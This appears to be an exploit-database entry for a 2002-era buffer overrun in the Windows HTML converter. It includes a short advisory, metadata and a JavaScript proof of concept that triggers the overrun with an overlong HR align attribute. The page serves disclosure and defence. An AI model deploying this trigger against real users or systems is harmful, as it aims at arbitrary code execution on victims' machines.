Microsoft Windows HTML Converter Boundary Condition Error

vendor:

Windows

by:

SecurityFocus

7.5

CVSS

HIGH

Buffer Overrun

120

CWE

Product Name: Windows

Affected Version From: Microsoft Windows 2000

Affected Version To: Microsoft Windows XP

Patch Exists: YES

Related CWE: CVE-2002-0649

CPE: o:microsoft:windows

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2002

Microsoft Windows HTML Converter Boundary Condition Error

Microsoft Windows platforms are prone to a boundary condition error in the HTML converter. If the 'Align' attribute of the 'HR' tag is given an excessively large value, an internal buffer will be overrun. This issue can be exploited via applications which use the HTML converter (such as Internet Explorer) and will permit arbitrary code to be executed on a vulnerable system.

Mitigation:

Ensure that the 'Align' attribute of the 'HR' tag is not given an excessively large value.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8016/info

Microsoft Windows platforms are prone to a boundary condition error in the HTML converter. If the 'Align' attribute of the 'HR' tag is given an excessively large value, an internal buffer will be overrun. This issue can be exploited via applications which use the HTML converter (such as Internet Explorer) and will permit arbitrary code to be executed on a vulnerable system.

<script>
wnd=open("about:blank","","");
wnd.moveTo(screen.Width,screen.Height);
WndDoc=wnd.document;
WndDoc.open();
WndDoc.clear();
buffer="";
for(i=1;i<=127;i++)buffer+="X";
buffer+="DigitalScream";
WndDoc.write("<HR align='"+buffer+"'>");
WndDoc.execCommand("SelectAll");
WndDoc.execCommand("Copy");
wnd.close();
</script>